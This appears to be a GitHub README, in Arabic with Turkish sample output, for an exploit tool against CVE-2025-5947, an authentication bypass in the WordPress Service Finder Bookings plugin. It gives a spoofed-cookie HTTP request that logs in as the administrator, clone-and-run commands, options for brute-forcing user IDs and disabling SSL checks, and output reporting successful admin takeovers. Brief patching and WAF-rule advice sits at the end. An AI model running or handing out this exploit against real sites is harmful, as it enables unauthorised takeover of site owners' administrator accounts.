
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 إكسبلويت
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
أداة استغلال لثغرة تجاوز المصادقة في إضافة Service Finder Bookings ≤ 6.0
توجد ثغرة حرجة في تجاوز المصادقة في إضافة Service Finder Bookings لإصدارات 6.0 والإصدارات الأقدم.
يمكن للمهاجمين غير المصادق عليهم:
توجد مصادقة غير كافية للكوكيز في الدالة service_finder_switch_back():
// كود غير آمن
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// لا يوجد تحقق!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
خصائص الهجوم:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# عرض المساعدة
python exploit.py -h
# محاولة الدخول كمسؤول (ID=1)
python exploit.py -u http://target.com
# مع معرف مستخدم محدد
python exploit.py -u http://target.com -i 5
# القوة العمياء (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# بدون التحقق من SSL
python exploit.py -u http://target.com --no-ssl-verify
# مع مهلة زمنية مخصصة
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
المخرجات:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu
🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
المخرجات:
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
يتضمن الاستغلال الناجح المؤشرات التالية:
✅ كود استجابة HTTP 301 أو 302
✅ وجود /wp-admin/ في Header Location
✅ وجود wordpress_logged_in_ في Header Set-Cookie
هذه الأداة مخصصة فقط لـ:
يجب استخدامها بهذه الطريقة. الكاتب غير مسؤول.
التحديث الفوري
# التحديث من لوحة تحكم WordPress
# أو باستخدام WP-CLI
wp plugin update sf-booking
تعطيل الإضافة
wp plugin deactivate sf-booking
حذف الإضافة
wp plugin delete sf-booking
جدار حماية تطبيقات الويب (WAF)
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
الفحص الأمني
للتبليغ عن الأخطاء أو اقتراح التحسينات:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT License - راجع ملف LICENSE للتفاصيل
باحث أمني
⭐ إذا وجدتها مفيدة، قم بإعطاء نجمة!
| الميزة | القيمة |
|---|
| CVE ID | CVE-2025-5947 |
| الإضافة | Service Finder Bookings (sf-booking) |
| الإصدار المتأثر | ≤ 6.0 |
| الشدة | 🔴 حرج |
| نقاط CVSS | 9.8 |
| CWE | CWE-639 (تجاوز التفويض) |
| نقاط EPSS | 0.617 (النسبة المئوية 98.357) |
| تاريخ النشر | 2025 |
| المعلمة | الاختصار | الوصف | الافتراضي |
|---|
--url | -u | عنوان الهدف (إجباري) | - |
--user-id | -i | معرف المستخدم | 1 |
--brute-force | -b | نطاق القوة العمياء (1-10) | - |
--no-ssl-verify | - | تعطيل التحقق من SSL | False |
--timeout | -t | مهلة الطلب (بالثواني) | 10 |